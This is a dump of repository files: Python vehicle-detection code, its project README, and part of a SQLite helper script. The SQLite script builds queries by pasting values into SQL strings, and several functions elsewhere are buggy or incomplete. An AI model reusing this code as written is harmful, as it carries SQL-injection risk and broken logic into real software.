inputs\n# then draws boxes in that color on the output\ndef draw_boxes_visual(img, bboxes, color=(0, 0, 255), thick=6):\n # make a copy of the image\n draw_img = np.copy(img)\n # draw each bounding box on your image copy using cv2.rectangle()\n for p1, p2 in bboxes:\n clone = np.copy(img)\n cv2.rectangle(clone, p1, p2, color, thick)\n cv2.imshow(\"Window\", clone)\n cv2.waitKey(1)\n time.sleep(0.05)\n cv2.rectangle(draw_img, p1, p2, color, thick)\n # return the image copy with boxes drawn\n return draw_img\n\n# Convert from RGB to the specified color space\ndef color_config(img, cspace='RGB'):\n if cspace != 'RGB':\n if cspace == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif cspace == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif cspace == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif cspace == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif cspace == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n else: feature_image = np.copy(img)\n return feature_image \n\ndef color_hist(img, nbins=32, bins_range=(0, 256)):\n # Compute the histogram of the channels separately\n channel1_hist = np.histogram(img[:,:,0], bins=nbins, range=bins_range)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n # Return the individual histograms, bin_centers and feature vector\n return hist_features\n\ndef bin_spatial(img, color_space='RGB', size=(32, 32)):\n # Convert image to new color space (if specified)\n # Use cv2.resize().ravel() to create the feature vector\n img = color_config(img, cspace=color_space) \n img = cv2.resize(img, size)\n features = img.ravel()\n # Return the feature vector\n return features\n\n#Gets HOG features and can return a visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, vis=False,\n feature_vec=True):\n \n \"\"\"\n Function accepts params and returns HOG features (optionally flattened) and an optional matrix for \n visualization. Features will always be the first return (flattened if feature_vector= True).\n A visualization matrix will be the second return if visualize = True.\n \"\"\"\n return hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block),\n block_norm= 'L2-Hys', transform_sqrt=False, \n visualise= vis, feature_vector= feature_vec)\n\n# Define a function to extract features from a list of images\n# Have this function call bin_spatial() and color_hist()\ndef extract_features(imgs, cspace='RGB', spatial_size=(32, 32),\n hist_bins=32, hist_range=(0, 256), hog_channel=\"ALL\",\n orient=9, pix_per_cell=8, cell_per_block=2,\n spatial_feat=True, hist_feat=True, hog_feat=True):\n # Create a list to append feature vectors to\n features = []\n # Iterate through the list of images\n for file in imgs:\n feat_list = []\n # Read in each one by one\n img = mpimg.imread(file)\n # apply color conversion if other than 'RGB'\n img = color_config(img, cspace=cspace) \n # Apply bin_spatial() to get spatial color features\n img = cv2.resize(img, (64, 64))\n rgb_img = color_config(img, cspace='RGB')\n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spat_feat = cv2.resize(rgb_img, spatial_size)\n spat_feat = spat_feat.ravel()\n feat_list.append(spat_feat)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(rgb_img, nbins=hist_bins)\n #6) Append features to list\n feat_list.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(img.shape[2]):\n hog_features.append(get_hog_features(img[:,:,channel], \n orient, pix_per_cell, cell_per_block))\n hog_features = np.ravel(hog_features) \n else:\n hog_features = get_hog_features(img[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block)\n feat_list.append(hog_features)\n # Append the new feature vector to the features list\n if len(feat_list) == 1:\n features.append(feat_list[0])\n else:\n features.append(np.concatenate(feat_list))\n # Return list of feature vectors\n return features\n\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, cspace='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=\"ALL\",\n spatial_feat=True, hist_feat=True, hog_feat=True): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n feat_img = color_config(img, cspace=cspace)\n feat_img = cv2.resize(feat_img, (64, 64)) \n rgb_img = color_config(feat_img, cspace='RGB') \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n #4) Append features to list\n spat_feat = cv2.resize(rgb_img, spatial_size)\n spat_feat = spat_feat.ravel()\n img_features.append(spat_feat)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(rgb_img, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feat_img.shape[2]):\n hog_features.append(get_hog_features(feat_img[:,:,channel], \n orient, pix_per_cell, cell_per_block))\n hog_features = np.ravel(hog_features) \n else:\n hog_features = get_hog_features(feat_img[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block)\n img_features.append(hog_features)\n if len(img_features) == 1:\n return np.array(img_features[0])\n else:\n #9) Return concatenated array of features\n return np.concatenate(img_features)\n\n \n# Define a function that takes an image,\n# start and stop positions in both x and y, \n# window size (x and y dimensions), \n# and overlap fraction (for both x and y)\ndef slide_window(img, x_start_stop=[None, None], y_start_stop=[None, None], \n xy_window=(64, 64), xy_overlap=(0.5, 0.5)):\n # If x and/or y start/stop positions not defined, set to image size\n if x_start_stop[0] == None:\n x_start_stop[0] = 0\n if x_start_stop[1] == None:\n x_start_stop[1] = img.shape[1]\n if y_start_stop[0] == None:\n y_start_stop[0] = 0\n if y_start_stop[1] == None:\n y_start_stop[1] = img.shape[0]\n # Compute the span of the region to be searched \n xspan = x_start_stop[1] - x_start_stop[0]\n yspan = y_start_stop[1] - y_start_stop[0]\n # Compute the number of pixels per step in x/y\n nx_pix_per_step = np.int(xy_window[0]*(1 - xy_overlap[0]))\n ny_pix_per_step = np.int(xy_window[1]*(1 - xy_overlap[1]))\n # Compute the number of windows in x/y\n nx_buffer = np.int(xy_window[0]*(xy_overlap[0]))\n ny_buffer = np.int(xy_window[1]*(xy_overlap[1]))\n nx_windows = np.int((xspan-nx_buffer)/nx_pix_per_step) \n ny_windows = np.int((yspan-ny_buffer)/ny_pix_per_step) \n # Initialize a list to append window positions to\n window_list = []\n # Loop through finding x and y window positions\n # Note: you could vectorize this step, but in practice\n # you'll be considering windows one by one with your\n # classifier, so looping makes sense\n for ys in range(ny_windows):\n for xs in range(nx_windows):\n # Calculate window position\n startx = xs*nx_pix_per_step + x_start_stop[0]\n endx = startx + xy_window[0]\n starty = ys*ny_pix_per_step + y_start_stop[0]\n endy = starty + xy_window[1]\n # Append window position to list\n window_list.append(((startx, starty), (endx, endy)))\n # Return the list of windows\n return window_list\n\n\n# Define a function you will pass an image \n# and the list of windows to be searched (output of slide_windows())\ndef search_windows(img, windows, clf, scaler, cspace='LUV', \n spatial_size=(64, 64), hist_bins=32, \n hist_range=(0, 256), orient=9, \n pix_per_cell=8, cell_per_block=2, \n hog_channel=\"ALL\", spatial_feat=False, \n hist_feat=True, hog_feat=True):\n\n #1) Create an empty list to receive positive detection windows\n on_windows = []\n #print(len(windows))\n #2) Iterate over all windows in the list\n for window in windows:\n #3) Extract the test window from original image\n test_img = img[window[0][1]:window[1][1], window[0][0]:window[1][0]] \n #4) Extract features for that window using single_img_features()\n features = single_img_features(test_img, cspace=cspace, orient=orient, pix_per_cell=pix_per_cell, cell_per_block=cell_per_block)\n #5) Scale extracted features to be fed to classifier\n test_features = scaler.transform(np.array(features).reshape(1, -1))\n #6) Predict using your classifier\n prediction = clf.predict(test_features)\n #7) If positive (prediction == 1) then save the window\n if prediction == 1:\n on_windows.append(window)\n #8) Return windows for positive detections\n #print(len(on_windows))\n return on_windows\n\ndef save_on_windows(img, windows, id, num):\n for i, window in enumerate(windows):\n filename = \"hard_negative/tosave{}.png\".format(str(id) + \"_\" + str(num) +\"_\"+ str(i))\n #3) Extract the test window from original image\n save_img = img[window[0][1]:window[1][1], window[0][0]:window[1][0]]\n save_img = (save_img*255.0).astype(\"uint8\")\n save_img = cv2.cvtColor(save_img, cv2.COLOR_RGB2BGR)\n cv2.imwrite(filename, save_img)\n\ndef add_heat(heatmap, bbox_list):\n # Iterate through list of bboxes\n for box in bbox_list:\n # Add += 1 for all pixels inside each bbox\n # Assuming each \"box\" takes the form ((x1, y1), (x2, y2))\n heatmap[box[0][1]:box[1][1], box[0][0]:box[1][0]] += 1\n\n # Return updated heatmap\n return heatmap# Iterate through list of bboxes\n\ndef apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap\n\ndef draw_labeled_bboxes(img, labels):\n bboxes = []\n areas = []\n # Iterate through all detected cars\n for car_number in range(1, labels[1]+1):\n # Find pixels with each car_number label value\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n bboxes.append(bbox)\n area = Frame.get_area(bbox)\n areas.append(area)\n #Remove false positive\n new_areas = [] \n new_bbox = []\n for area, box in zip(areas,bboxes):\n if area > 2000:\n new_bbox.append(box)\n new_areas.append(area)\n areas = new_areas\n bboxes = new_bbox\n if(len(bboxes) > 2):\n small = None\n small_area = None \n for i, area in enumerate(areas):\n if small == None:\n small = i\n small_area = area\n elif(area < small_area):\n small_area = area\n small = i \n del areas[small]\n del bboxes[small] \n for area, box in zip(areas,bboxes):\n cv2.rectangle(img, box[0], box[1], (0,255,0), 6)\n # Iterate through all detected cars\n # for car_number in range(1, labels[1]+1):\n # # Find pixels with each car_number label value\n # nonzero = (labels[0] == car_number).nonzero()\n # # Identify x and y values of those pixels\n # nonzeroy = np.array(nonzero[0])\n # nonzerox = np.array(nonzero[1])\n # # Define a bounding box based on min/max x and y\n # bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n # print(Frame.get_area(bbox))\n # # Draw the box on the image\n # cv2.rectangle(img, bbox[0], bbox[1], (0,255,0), 6)\n # Return the image\n return img\n\n# class Containers():\n# def __init__(self):\n# # was the line detected in the last iteration?\n# frames = []\n# def add_frame(box):\n# new_frame = Frame()\n# new_frame.add_box(box)\n# frames.add(new_frame)\n\n# def add_boxes(boxes):\n# prosp_list = \n# frame_list = list(self.frames)\n# matches = []\n# for frame in frame_list:\n# best_fit = np.nan\n# best_dist = 0\n# for prosp in prosp_list:\n# if (best_fit is np.nan):\n# best_fit = prosp\n# best_dist = abs(frame.xmin - prosp[0][0])\n# else:\n# new_dist = abs(frame.xmin - prosp[0][0])\n# if new_dist < best_dist:\n# best_dist = new_dist\n# best_fit = prosp\n\n\n\nclass Frame():\n def __init__(self, outline):\n self.frames = deque()\n # Average area of boxes for the previous 5 labels.\n self.avg = 0\n self.max_avg = 0\n self.xmin = 0\n #the left most x value of the outlines\n self.left = 0\n # def add_box(box):\n # if box !\n # area = get_area(box)\n # self.frames.appendleft(area)\n # if (len(self.frames) > self.max_avg):\n # self.frames.pop() \n # self.avg = np.nanmean(self.frames)\n # if \n # self.xmin = box[0][0]\n def get_area(box):\n l = box[1][0] - box[0][0]\n h = box[1][1] - box[0][1]\n return l * h\n def get_xmin():\n return self.xmin\n def can_remove():\n return \n\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n\n\n\t\nif __name__ == \"__main__\":\n\t# performs under different binning scenarios\n\tspatial = 32\n\thistbin = 32\n\t# Define a labels vector based on features lists\n\ty = np.hstack((np.ones(len(car_features)), \n\t np.zeros(len(notcar_features))))\n\t# Create an array stack of feature vectors\n\tX = np.vstack((car_features, notcar_features)).astype(np.float64)\n\t# Split up data into randomized training and test sets\n\trand_state = np.random.randint(0, 100)\n\tX_train, X_test, y_train, y_test = train_test_split(\n \tX, y, test_size=0.2, random_state=rand_state)\n\t# Fit a per-column scaler only on the training data\n\tX_scaler = StandardScaler().fit(X_train)\n\t# Apply the scaler to both X_train and X_test\n\tscaled_X_train = X_scaler.transform(X_train)\n\tscaled_X_test = X_scaler.transform(X_test)\n\n\n\n\n\n\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n\n\n\n# Define a function to search for template matches\n# and return a list of bounding boxes\ndef find_matches(img, template_list):\n # Define an empty list to take bbox coords\n bbox_list = []\n # Define matching method\n # Other options include: cv2.TM_CCORR_NORMED', 'cv2.TM_CCOEFF', 'cv2.TM_CCORR',\n # 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED'\n method = cv2.TM_CCOEFF_NORMED\n # Iterate through template list\n for temp in template_list:\n # Read in templates one by one\n tmp = mpimg.imread(\"prac_img/cutouts/\" + temp)\n # Use cv2.matchTemplate() to search the image\n result = cv2.matchTemplate(img, tmp, method)\n # Use cv2.minMaxLoc() to extract the location of the best match\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n # Determine a bounding box for the match\n w, h = (tmp.shape[1], tmp.shape[0])\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n top_left = min_loc\n else:\n top_left = max_loc\n bottom_right = (top_left[0] + w, top_left[1] + h)\n # Append bbox position to list\n bbox_list.append((top_left, bottom_right))\n # Return the list of bounding boxes\n \n return bbox_list\n\ndef doTemplate():\n\tbboxes = find_matches(image, templist)\n\tresult = draw_boxes(image, bboxes)\n\tplt.imshow(result)\n\tplt.savefig(\"prac_img/template_matching\")\n\ndef plot3d(pixels, colors_rgb,\n axis_labels=list(\"RGB\"), axis_limits=((0, 255), (0, 255), (0, 255))):\n \"\"\"Plot pixels in 3D.\"\"\"\n\n # Create figure and 3D axes\n fig = plt.figure(figsize=(8, 8))\n ax = Axes3D(fig)\n\n # Set axis limits\n ax.set_xlim(*axis_limits[0])\n ax.set_ylim(*axis_limits[1])\n ax.set_zlim(*axis_limits[2])\n\n # Set axis labels and sizes\n ax.tick_params(axis='both', which='major', labelsize=14, pad=8)\n ax.set_xlabel(axis_labels[0], fontsize=16, labelpad=16)\n ax.set_ylabel(axis_labels[1], fontsize=16, labelpad=16)\n ax.set_zlabel(axis_labels[2], fontsize=16, labelpad=16)\n\n # Plot pixel values with colors given in colors_rgb\n ax.scatter(\n pixels[:, :, 0].ravel(),\n pixels[:, :, 1].ravel(),\n pixels[:, :, 2].ravel(),\n c=colors_rgb.reshape((-1, 3)), edgecolors='none')\n\n return ax # return Axes3D object for further manipulation\n\n\ndef do_color_hist():\n\timage = mpimg.imread('prac_img/cutouts/cutout1.jpg')\n\trh, gh, bh, bincen, feature_vec = color_hist(image, nbins=32, bins_range=(0, 256))\n\n\t# Plot a figure with all three bar charts\n\tif rh is not None:\n\t fig = plt.figure(figsize=(12,3))\n\t plt.subplot(131)\n\t plt.bar(bincen, rh[0])\n\t plt.xlim(0, 256)\n\t plt.title('R Histogram')\n\t plt.subplot(132)\n\t plt.bar(bincen, gh[0])\n\t plt.xlim(0, 256)\n\t plt.title('G Histogram')\n\t plt.subplot(133)\n\t plt.bar(bincen, bh[0])\n\t plt.xlim(0, 256)\n\t plt.title('B Histogram')\n\t fig.tight_layout()\n\t plt.savefig(\"prac_img/color_histo\")\n\telse:\n\t print('Your function is returning None for at least one variable...')\n\ndef doFeatExtract():\n images = glob.glob('prac_img\\\\smallset/*/*/*.jpeg')\n cars = []\n notcars = []\n for image in images:\n if 'image' in image or 'extra' in image:\n notcars.append(image)\n else:\n cars.append(image)\n\n car_features = extract_features(cars, cspace='RGB', spatial_size=(32, 32),\n hist_bins=32, hist_range=(0, 256))\n notcar_features = extract_features(notcars, cspace='RGB', spatial_size=(32, 32),\n hist_bins=32, hist_range=(0, 256))\n\n if len(car_features) > 0:\n # Create an array stack of feature vectors\n X = np.vstack((car_features, notcar_features)).astype(np.float64) \n # Fit a per-column scaler\n X_scaler = StandardScaler().fit(X)\n # Apply the scaler to X\n scaled_X = X_scaler.transform(X)\n car_ind = np.random.randint(0, len(cars))\n # Plot an example of raw and scaled features\n fig = plt.figure(figsize=(12,4))\n plt.subplot(131)\n plt.imshow(mpimg.imread(cars[car_ind]))\n plt.title('Original Image')\n plt.subplot(132)\n plt.plot(X[car_ind])\n plt.title('Raw Features')\n plt.subplot(133)\n plt.plot(scaled_X[car_ind])\n plt.title('Normalized Features')\n fig.tight_layout()\n else: \n print('Your function only returns empty feature vectors...')\n\n# Define a function to return some characteristics of the dataset \n# Pass in the path to the car and notcar images for the dataset\ndef data_look(car_list, notcar_list):\n data_dict = {}\n # Define a key in data_dict \"n_cars\" and store the number of car images\n data_dict[\"n_cars\"] = len(car_list)\n # Define a key \"n_notcars\" and store the number of notcar images\n data_dict[\"n_notcars\"] = len(notcar_list)\n # Read in a test image, either car or notcar\n example_img = mpimg.imread(car_list[0])\n # Define a key \"image_shape\" and store the test image shape 3-tuple\n data_dict[\"image_shape\"] = example_img.shape\n # Define a key \"data_type\" and store the data type of the test image.\n data_dict[\"data_type\"] = example_img.dtype\n # Return data_dict\n return data_dict\n\n\n # if len(frames) == 0:\n # for box in bboxes: \n # new_frame = frame()\n # new_frame.add_box(box)\n # elif len(frames) == 1:\n # if len(bbox) == 0:\n # frames[0].add_box(np.nan)\n # elif len(bbox == 1):\n # frames[0].add_box(bbox[0])\n # else:\n # comp = frames[0].get_minx()\n # box1_dist = abs(bbox[0][0][0] - comp)\n # box2_dist = abs(bbox[1][0][0] - comp)\n # if box1_dist > box2_dist:\n # frames[0].add_box[bbox[1]]\n # new_frame = Frame()\n # new_frame.add_box[bbox[0]]\n # else:\n # frames[0].add_box[bbox[0]]\n # new_frame = Frame()\n # new_frame.add_box[bbox[1]]\n # else:\n # if len(bbox) == 0:\n # for fr in frames:\n # fr.add_box(np.nan)\n # elif len(bbox == 1):\n # frames[0].add_box(bbox[0])\n # else:\n # comp = frames[0].get_minx()\n # box1_dist = abs(bbox[0][0][0] - comp)\n # box2_dist = abs(bbox[1][0][0] - comp)\n # if box1_dist > box2_dist:\n # frames[0].add_box[bbox[1]]\n # new_frame = Frame()\n # new_frame.add_box[bbox[0]]\n # else:\n # frames[0].add_box[bbox[0]]\n # new_frame = Frame()\n # new_frame.add_box[bbox[1]]" }, { "alpha_fraction": 0.7751035690307617, "alphanum_fraction": 0.7866338491439819, "avg_line_length": 92.01041412353516, "blob_id": "5c756aa37ce72afe9ab7d62e073f0dcda5cf59b2", "content_id": "4c3d789d867848707fd8b23f6ea308b0128bd7e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8945, "license_type": "no_license", "max_line_length": 983, "num_lines": 96, "path": "/CarND-Vehicle-Detect/README.md", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "\n# Vehicle Detection Project\n---\n\nThe goals / steps of this project are the following:\n\n* Perform a Histogram of Oriented Gradients (HOG) feature extraction on a labeled training set of images and train a classifier Linear SVM classifier\n* Apply a color transform and append binned color features, as well as histograms of color, to HOG feature vector. \n* Normalize features and randomize a selection for training and testing.\n* Implement a sliding-window technique and use trained classifier to search for vehicles in images.\n* Run pipeline on a video stream (start with the test_video.mp4 and later implement on full project_video.mp4) and create a heat map of recurring detections frame by frame to reject outliers and follow detected vehicles.\n* Estimate a bounding box for vehicles detected.\n\n[//]: # (Image References)\n[image1]: ./hog_prac/orient_1_cell8_pix4.png\n[image2]: ./hog_prac/orient_3_cell8_pix4.png\n[image3]: ./hog_prac/orient_13_cell8_pix4.png\n[image4]: ./stat_data.png\n[image5]: ./output_images/2search_windows2.png\n[image6]: ./output_images/0search_windows3.png\n[image7]: ./output_images/3search_windows2.png\n[video1]: ./project_video.mp4\n\n## [Rubric](https://review.udacity.com/#!/rubrics/513/view) Points\n### Here I will consider the rubric points individually and describe how I addressed each point in my implementation. \n\n---\n### Writeup / README\n\n#### 1. Provide a Writeup / README that includes all the rubric points and how you addressed each one. You can submit your writeup as markdown or pdf. [Here](https://github.com/udacity/CarND-Vehicle-Detection/blob/master/writeup_template.md) is a template writeup for this project you can use as a guide and a starting point. \n\nYou're reading it!\n\n### Histogram of Oriented Gradients (HOG)\n\n#### 1. Explain how (and identify where in your code) you extracted HOG features from the training images.\n\nThe code for this step is contained in `helper.py` on line 74-85.\nI started by reading in all the vehicle and non-vehicle images. I then tried to get an intuition for the kind of HOG feature values I would obtain based on differing parameters. Here are a few images from my exploration:\n\n![alt text][image1]\n![alt text][image2]\n![alt text][image3]\n\nOther functions that facilitated extraction of the hog features are “extract_features” and “single_image_features” which can be found on lines 89 and 133, respectively, in helper.py. These functions would specify how many channels in a color space would be used for HOG extraction and they standardized the size of each image before extracting features.\n\n\n#### 2. Explain how you settled on your final choice of HOG parameters.\n\nI settled on my final choice of HOG parameters by see how well a classifier could predict on a validation set based on a specific permutation of color space and HOG parameters. Here are the different trials I ran through to come to my choice.\n\n![alt text][image4]\n\nAfter deciding on LUV as the color space based on a preliminary test, I adjusted the orientation value and pixels per cell to come to my choice of parameters. I then performed a test to see if increasing cell per block could help my score and I found a slight improvement going to 4 cells per block as opposed to 2. However, I wasn’t pleased by how long the feature extraction was taking when detecting on the final project video. To speed up time I increased the pixels per cell to 16. I then ran cross validation on the training set and found the YUV space to work the best for extracting the HOG features.\n\n#### 3. Describe how (and identify where in your code) you trained a classifier using your selected HOG features (and color features if you used them).\n\nI trained a Linear SVM with c value=0.001 to minimize false positives. Although other SVM kernels performed better on testing the Linear SVM is much quicker so I used it for the final detection process.\nThe actual implementation can be found in pipeline.py on lines 81-96 in the function trainModel which takes a training and test set, normalizes the training and test to a normal gaussian, and then fits the data set to the SVM chosen. The function will then predict on the test set and provide a score for the accuracy of its performance. \n\n\n### Sliding Window Search\n\n#### 1. Describe how (and identify where in your code) you implemented a sliding window search. How did you decide what scales to search and how much to overlap windows?\n\nI implemented window search on lines 175-213 and on lines 218-244 in the file helper.py. I decided upon my final window sliding area by playing with different parameters for the overlap and area of the window slide. The windows cover the bottom right of the image because the project video is only concerned with detecting cars in that area. The different square windows I use have side lengths of 64, 80, and 96. They overlap in such a way that one area of the window slide zone is overrepresented in the heatmap. If the heatmap is biased, then it would be hard to choose an appropriate cutoff threshold for the heatmap.\n\n![alt text][image5]\n\n#### 2. Show some examples of test images to demonstrate how your pipeline is working. What did you do to optimize the performance of your classifier?\n\nTo optimize the performance of the classifier I removed the KITTI_extracted dataset because it was causing issues with detecting the white car in the project video at long distances. To minimize false positives, I sampled the project video, hard mining for false positives. I then included these false positives in the non-vehicle dataset used for training. The classifier was also optimized by tuning the parameters in my feature extraction function discussed earlier. I also discovered how each window was performing by saving the windows detected for each scale and overlaying them on the test images.\nHere are some example images:\n\n![alt text][image5]\n![alt text][image6]\n![alt text][image7]\n---\n\n### Video Implementation\n\n#### 1. Provide a link to your final video output. Your pipeline should perform reasonably well on the entire project video (somewhat wobbly or unstable bounding boxes are ok as long as you are identifying the vehicles most of the time with minimal false positives.)\nHere's a [link to my video result](./project_video_output.mp4)\n\n\n#### 2. Describe how (and identify where in your code) you implemented some kind of filter for false positives and some method for combining overlapping bounding boxes.\n\nI recorded the positions of positive detections in each frame of the video. From the positive detections I created a heatmap and then thresholded that map to identify vehicle positions. I then used scipy.ndimage.measurements.label() to identify individual blobs in the heatmap. I then assumed each blob corresponded to a vehicle. This process is handled in lines 12-28 of cell 4 in jupyter notebook final.ipynb. I constructed bounding boxes to cover the area of each blob detected. If the blobs had an area less than 2000 I would remove them. This is done in the function draw_labeled_bboxes in helper.py. The bounding boxes are only placed after every 10 frames to increase stability and further defend against false positives. Each bounding box overlaid on the video was an average of the previous 10 frames. This averaging was done in the Boxes class defined in cell 6 of the jupyter notebook final.ipynb.\n\n---\n\n### Discussion\n\n#### 1. Briefly discuss any problems / issues you faced in your implementation of this project. Where will your pipeline likely fail? What could you do to make it more robust?\n\nThe biggest issues I faced were from the choice of windows for the window slide and the parameters set for the feature extraction, especially for HOG features. I went through many different iterations of window slide areas. Some windows were much smaller but ended up giving me more false positives, so I didn’t include them in the final pipeline. My pipeline performs pretty well on the video with only one false positive, but due to this false positive I could see the video having more difficulty on a street with more external activity like in a city. My pipeline also takes advantage of the project video constraint that the cars being detected are in the bottom right corner. I would be curious to see how the pipeline perform if the car changed lanes. My pipeline will also fail if the relative speed of the cars in view is much different than our car. Because I average 10 frames to make my boxes it would likely miss the car if it changes positions in the video too quickly.\nTo make the pipeline more robust I would increase the area of the window slides to cover more of the camera view. I would also create a queue that takes in a car class object so I could average the frames in that way. This could help me have more concentrated and distinct boxes for the car and save information pertaining to a specific car. This could slow down the pipeline though. \n\n\n" } ]
6
dadadel/manage_sqlite3_db
https://github.com/dadadel/manage_sqlite3_db
05b8b1c6053c8e67e7cd1319c85ee16f57caf470
892311822ec9985abe9f484c986155ccc4bd6528
64af516a32c235c8ce565184ddc3c77930f534b1
refs/heads/master
2021-01-11T10:48:14.419565
2015-03-17T21:05:51
2015-03-17T21:05:51
40,757,272
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.4738847315311432, "alphanum_fraction": 0.47806316614151, "avg_line_length": 31.285715103149414, "blob_id": "3097172d87bfd59bddd33780f99f5d04cd3fff32", "content_id": "cf7bacb159ec257d7d6543951e59e31716c6b3bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8137, "license_type": "no_license", "max_line_length": 104, "num_lines": 252, "path": "/manage_db.py", "repo_name": "dadadel/manage_sqlite3_db", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n__author__ = \"A. Daouzli\"\n__version__ = \"0.1\"\n\nimport os\nimport re\nimport sqlite3\n\n\nclass ManageSqliteDB(object):\n def __init__(self, db_file=\"tst.sqlite\", auto=False):\n '''Initializes the DB object.\n :param db_file: the file that contains the sqlite DB\n :type db_file: str\n :param auto: if True will open the DB else the user will have to run\n himself the method `opendb()`.'''\n self.db_file = db_file\n self.db = None\n if auto == True:\n self.opendb()\n\n def __del__(self):\n self.closedb()\n\n def opendb(self, db_file=None):\n '''Open the DB from file and create a cursor.'''\n if db_file is not None:\n self.db_file = db_file\n result = True\n db = sqlite3.connect(self.db_file)\n if db is None:\n print(\"failed to open DB '{}'\".format(self.db_file))\n result = False\n else:\n self.db = db\n self.cursor = db.cursor()\n return result\n\n def closedb(self):\n if self.db:\n self.db.commit()\n self.cursor.close()\n self.db.close()\n self.db = None\n self.cursor = None\n\n def create(self, table, fields):\n '''Creates a table with provided fields.\n :param fields: list of either name fields (will be TEXT) or tuples\n (name,type).\n :type fileds: list of str and/or tuples\n '''\n txt = ''\n for field in fields:\n if type(field) is tuple:\n txt += field[0] + \" \" + field[1]\n else:\n txt += field + \" TEXT\"\n txt += ', '\n txt = \", \".join(txt.split(\", \")[:-1])\n req = \"CREATE TABLE {} ({})\".format(table, txt)\n self.request(req)\n\n def list_tables(self):\n self.request(\"SELECT name FROM sqlite_master WHERE type='table'\")\n return [e[0] for e in self.cursor.fetchall()]\n\n def list_fields(self, table):\n self.request(\"PRAGMA table_info('{}')\".format(table))\n return [e[1] for e in self.cursor.fetchall()]\n\n def request(self, req, values=None):\n if values:\n self.cursor.execute(req, values)\n else:\n self.cursor.execute(req)\n self.db.commit()\n\n def set(self, table, **kwargs):\n '''Sets records in a table.\n\n :param table: the table\n :param **kwargs: set of key/value to set in the table\n '''\n val_pattern = '? ' * len(kwargs.values())\n val_pattern = \", \".join(val_pattern.split())\n values = tuple(kwargs.values())\n req = \"INSERT INTO {}({}) VALUES ({})\".format(table,\n \"'\" + \"','\".join(kwargs.keys()) + \"'\",\n val_pattern\n )\n self.request(req)\n\n def update(self, table, where, **kwargs):\n \"\"\"Update a record.\n :param table: the concerned table\n :param where: the condition(s)\n :type where: dict\n :param kwargs: the parameters to set\n :type kwargs: dict\n \"\"\"\n values = tuple(kwargs.values() + where.values())\n by = \", \".join([k + \"=?\" for k in kwargs.keys()])\n where = \" AND \".join([k + \"=?\" for k in where.keys()])\n req = \"UPDATE {} SET {} WHERE {};\".format(table,\n by,\n where\n )\n self.request(req, values)\n\n def get(self, table, fields=None, **kwargs):\n '''Gets from the DB some fields from all records with or without\n condition(s).\n :param fields: list of fields to retrieve. If not given all fields are\n retrieved.\n :type fields: list or None\n :param kwargs: the wanted values for fields as condition\n :type kwargs: dict\n :returns: a list of the found items\n :rtype: list of tuples\n '''\n if fields is None:\n fields = '*'\n else:\n fields = \", \".join(fields)\n if len(kwargs):\n condition = \" AND \".join([k + \"='\" + v + \"'\" for k, v in kwargs.items()])\n req = \"SELECT {} FROM {} WHERE {}\".format(\n fields,\n table,\n condition\n )\n else:\n req = \"SELECT {} FROM {}\".format(\n fields,\n table\n )\n self.request(req)\n res = self.cursor.fetchall()\n return res\n\n def delete(self, table, **kwargs):\n condition = \" AND \".join([k + \"='\" + v + \"'\" for k, v in kwargs.items()])\n req = \"DELETE FROM {} WHERE {}\".format(\n table,\n condition\n )\n self.request(req)\n\n\ndef show_menu():\n txt = '------------\\n'\n txt += '0 - exit\\n'\n txt += '1 - open DB\\n'\n txt += '2 - close\\n'\n txt += '3 - get\\n'\n txt += '4 - set\\n'\n txt += '5 - del\\n'\n txt += '6 - list tables\\n'\n txt += '7 - create table\\n'\n txt += '8 - request\\n'\n txt += '9 - list 